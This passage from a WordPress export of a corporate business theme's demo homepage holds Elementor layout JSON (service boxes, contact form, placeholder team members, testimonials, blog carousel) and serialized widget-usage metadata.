0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#AFC1CE","is_border":"","icon_space":{"unit":"px","size":25,"sizes":[]},"icon_size":{"unit":"px","size":48,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"8390dda","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5bb4891","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Finance Planning","des":"It is almost impossible to make strategic decisions without deep knowledge","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_line":"","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"bg_hover_box":"#0B2A41","bg_hover_icon_bg":"#12344D","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#AFC1CE","is_border":"","icon_space":{"unit":"px","size":25,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"828d27d","elType":"section","settings":{"content_width":{"unit":"px","size":1446,"sizes":[]},"gap":"no","padding":{"unit":"px","top":"0","right":"0","bottom":"170","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"3d56c5b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"2f547f2","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","content_position":"middle"},"elements":[{"id":"3a38825","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin":{"unit":"px","top":"-50","right":"0","bottom":"0","left":"55","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"ac239d8","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image3-home4.jpg","id":1879},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"align":"left","_margin":{"unit":"px","top":"0","right":"-55","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"5626e68","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"background_background":"classic","background_color":"#FFFFFF","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"margin":{"unit":"px","top":"0","right":"0","bottom":"-50","left":"-55","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"padding":{"unit":"px","top":"0","right":"70","bottom":"0","left":"70","isLinked":false},"padding_tablet":{"unit":"px","top":"70","right":"70","bottom":"70","left":"70","isLinked":true},"padding_mobile":{"unit":"px","top":"30","right":"30","bottom":"60","left":"30","isLinked":false},"z_index":1},"elements":[{"id":"ee849fa","elType":"widget","settings":{"sub":"TO BECOME A CLIENT","title":"Ready to<span class=\"hl-text\"> Get Started?<\/span>","header_size":"h3","subtitle_style":"is_line","stitle_color":"#95A2AC","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","title_color":"#0B2A41","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"iheading"},{"id":"2cd8de7","elType":"widget","settings":{"editor":"<p>Please, fulfill the form to get a consultation. After processing the data, a personal manager will contact you.<\/p>","_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ff0f18d","elType":"widget","settings":{"cf7":"1536","css_responce":"color: #000;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"431af39","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-home4.jpg","id":1910},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"115","right":"0","bottom":"312","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"05d681d","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b8fb46c","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7278842","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"a80400c","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"d897240","elType":"widget","settings":{"sub":"WE ARE THERE FOR YOU","title":"Meet Our<span class=\"hl-text\"> Professional Team<\/span>","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","stitle_color":"#95A2AC","title_color":"#0B2A41"},"elements":[],"widgetType":"iheading"},{"id":"c130bd6","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#5F5F5F"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"ba644f4","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"f617a13","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","margin":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"9873009","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"25d0b61","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1-circle.png","id":1896},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Twitter","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"f1872ed"},{"title":"Facebook","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"49fd829"},{"title":"Pinterest","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"67f7e9b"},{"_id":"2801580","title":"Social","social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""}}],"bg_box":"#FFFFFF","title_color":"#0B2A41","job_typography_typography":"custom","job_typography_font_family":"Inter","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"padding_box":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"imember3"}],"isInner":true},{"id":"5de3e8f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f69820a","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2-circle.png","id":1903},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Twitter","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"f1872ed"},{"title":"Facebook","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"49fd829"},{"title":"Pinterest","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"67f7e9b"},{"_id":"2801580","title":"Social","social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""}}],"bg_box":"#FFFFFF","title_color":"#0B2A41","job_typography_typography":"custom","job_typography_font_family":"Inter","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"padding_box":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"imember3"}],"isInner":true},{"id":"0082e55","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"7de2605","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3-circle.png","id":1897},"member_name":"Peter Perish","member_extra":"international Consultant","social_share":[{"title":"Twitter","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"f1872ed"},{"title":"Facebook","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"49fd829"},{"title":"Pinterest","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"67f7e9b"},{"_id":"2801580","title":"Social","social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""}}],"bg_box":"#FFFFFF","title_color":"#0B2A41","job_typography_typography":"custom","job_typography_font_family":"Inter","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"padding_box":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"imember3"}],"isInner":true},{"id":"ae01638","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"488237c","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4-circle.png","id":1898},"member_name":"Peter Perish","member_extra":"co-founder of company","social_share":[{"title":"Twitter","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"f1872ed"},{"title":"Facebook","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"49fd829"},{"title":"Pinterest","social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"67f7e9b"},{"_id":"2801580","title":"Social","social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"social_link":{"url":"https:\/\/","is_external":"","nofollow":"","custom_attributes":""}}],"bg_box":"#FFFFFF","title_color":"#0B2A41","job_typography_typography":"custom","job_typography_font_family":"Inter","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"padding_box":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"imember3"}],"isInner":true}],"isInner":true},{"id":"83b0ae7","elType":"widget","settings":{"align":"center","text":"view all","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-corporate\/our-team\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"a655341","elType":"section","settings":{"content_width":{"unit":"px","size":1350,"sizes":[]},"margin":{"unit":"px","top":"-190","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"9d07833","elType":"column","settings":{"_column_size":100,"_inline_size":null,"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-home4.jpg","id":1849},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[{"id":"968233f","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2241},"tname":"Oliver Simson","tjob":"client of company","_id":"35a6f18"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"e8a2209"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"9fe10c8"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"cb4433c"}],"tshow":"3","tcontent_bg":"#02010100","tcontent_color":"#C5D1DA","tcontent_box_shadow_box_shadow_type":"yes","tcontent_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"name_color":"#FFFFFF","dots_spacing":{"unit":"px","size":-40,"sizes":[]},"autoplay":"false","dots_spacing_mobile":{"unit":"px","size":-30,"sizes":[]},"_padding":{"unit":"px","top":"70","right":"60","bottom":"100","left":"40","isLinked":false},"_padding_mobile":{"unit":"px","top":"40","right":"0","bottom":"80","left":"0","isLinked":false},"is_reverse":"yes","content_typography_typography":"custom","content_typography_font_family":"Nunito","content_typography_font_size":{"unit":"px","size":17,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":14,"sizes":[]},"job_typography_font_weight":"400","dots_bgcolor":"#7693A9","dots_active_bgcolor":"#55BB53"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"8cad2b7","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"135","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"115","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"23c2559","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"f8d5e0b","elType":"section","settings":{"layout":"full_width","content_position":"bottom","structure":"20","margin":{"unit":"px","top":"0","right":0,"bottom":"32","left":0,"isLinked":false}},"elements":[{"id":"12eb8e2","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"4c42734","elType":"widget","settings":{"sub":"business blog","title":"Read Our <span class=\"hl-text\">Latest Insights<\/span>","header_size":"h3","subtitle_style":"is_line","stitle_color":"#95A2AC","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","title_color":"#0B2A41","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"fbbfa7a","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"cc58b12","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"view all","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-corporate\/blog\/","is_external":"","nofollow":"","custom_attributes":""},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":true}],"isInner":true},{"id":"6d97bcf","elType":"widget","settings":{"post_num":3,"dots":"false","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[],"widgetType":"ipostcarousel"}],"isInner":false}],"isInner":false},{"id":"4459e4e","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"background_background":"classic","padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"2b902c7","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4fd5884","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#55BB53","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"93b02de","elType":"column","settings":{"_column_size":50,"_inline_size":18,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"994b434","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Full_White.svg","id":1956},"image_size":"full","align":"left","width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"d1556b9","elType":"column","settings":{"_column_size":50,"_inline_size":82,"_inline_size_tablet":100},"elements":[{"id":"ed0c076","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[300]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:18:{s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:2;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:8:{s:11:"title_color";i:1;s:21:"typography_typography";i:2;s:22:"typography_font_family";i:2;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:2;s:25:"typography_text_transform";i:1;s:25:"typography_letter_spacing";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:4:{s:14:"_section_style";a:2:{s:7:"_margin";i:2;s:8:"_padding";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:6:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}s:17:"_section_position";a:1:{s:14:"_element_width";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:6;}}s:5:"style";a:1:{s:13:"section_style";a:7:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;s:10:"text_color";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"button_section";a:4:{s:4:"text";i:3;s:5:"align";i:2;s:4:"link";i:2;s:12:"align_mobile";i:1;}}s:8:"advanced";a:2:{s:17:"_section_position";a:1:{s:14:"_element_width";i:1;}s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:2:{s:11:"btn_padding";i:1;s:18:"btn_padding_mobile";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:8;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:8;s:5:"title";i:8;s:3:"des";i:8;s:4:"link";i:3;}}s:5:"style";a:3:{s:17:"style_box_section";a:7:{s:10:"icon_color";i:1;s:11:"title_color";i:8;s:9:"des_color";i:5;s:7:"icon_bg";i:5;s:7:"is_line";i:4;s:17:"title_hover_color";i:4;s:10:"des_hcolor";i:4;}s:18:"style_icon_section";a:7:{s:10:"icon_space";i:8;s:9:"icon_size";i:4;s:13:"icon_bg_width";i:4;s:10:"radius_box";i:1;s:27:"icon_shadow_box_shadow_type";i:5;s:22:"icon_shadow_box_shadow";i:5;s:17:"icon_space_mobile";i:4;}s:21:"style_content_section";a:9:{s:15:"title_space_top";i:4;s:18:"title_space_bottom";i:8;s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:28:"title_typography_font_weight";i:4;s:25:"des_typography_typography";i:1;s:24:"des_typography_font_size";i:1;s:26:"des_typography_font_weight";i:1;s:15:"content_padding";i:4;}}s:8:"advanced";a:4:{s:14:"_section_style";a:4:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;s:14:"_margin_tablet";i:2;s:8:"_padding";i:3;}s:17:"_section_position";a:1:{s:14:"_element_width";i:1;}s:19:"_section_background";a:2:{s:28:"_background_hover_background";i:7;s:23:"_background_hover_color";i:7;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:7;s:27:"_box_shadow_box_shadow_type";i:4;s:22:"_box_shadow_box_shadow";i:4;}}}}s:6:"column";a:3:{s:5:"count";i:59;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:59;s:19:"_inline_size_tablet";i:36;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:13:"margin_tablet";i:5;s:13:"margin_mobile";i:1;s:6:"margin";i:2;s:7:"padding";i:1;s:14:"padding_tablet";i:1;s:14:"padding_mobile";i:1;s:7:"z_index";i:1;}s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:12:"hide_desktop";i:1;s:11:"hide_mobile";i:1;}}s:5:"style";a:2:{s:13:"section_style";a:6:{s:21:"background_background";i:3;s:16:"background_color";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:3;s:21:"box_shadow_box_shadow";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:28;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:6:"margin";i:7;s:7:"padding";i:16;s:14:"padding_tablet";i:8;s:14:"padding_mobile";i:12;s:7:"z_index";i:3;s:13:"margin_tablet";i:5;s:13:"margin_mobile";i:1;}s:19:"_section_responsive";a:2:{s:12:"hide_desktop";i:1;s:11:"hide_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:6;s:16:"background_image";i:3;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:15:"background_size";i:3;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:6:"layout";i:14;s:3:"gap";i:13;s:16:"content_position";i:5;s:13:"content_width";i:5;}s:17:"section_structure";a:1:{s:9:"structure";i:16;}}}}s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:3;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:14:"_margin_tablet";i:2;s:14:"_margin_mobile";i:1;s:7:"_margin";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:7;s:5:"title";i:7;s:11:"header_size";i:7;s:5:"align";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:10:{s:14:"subtitle_style";i:4;s:12:"stitle_color";i:7;s:28:"stitle_typography_typography";i:7;s:27:"stitle_typography_font_size";i:7;s:29:"stitle_typography_font_weight";i:7;s:19:"stitle_bottom_space";i:1;s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:11:"title_color";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:4:{s:7:"_margin";i:2;s:15:"_padding_mobile";i:1;s:8:"_padding";i:3;s:14:"_margin_mobile";i:1;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:3:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:3:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:1:{s:14:"_border_radius";i:1;}}}}s:9:"iflip_box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:3;s:4:"link";i:3;s:6:"number";i:2;s:5:"title";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:21:"style_overlay_section";a:1:{s:10:"overlay_bg";i:3;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}s:18:"style_text_section";a:3:{s:11:"title_color";i:4;s:9:"per_color";i:4;s:26:"title_typography_font_size";i:3;}}}}s:10:"ipcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:12:"tshow_mobile";i:1;}}s:5:"style";a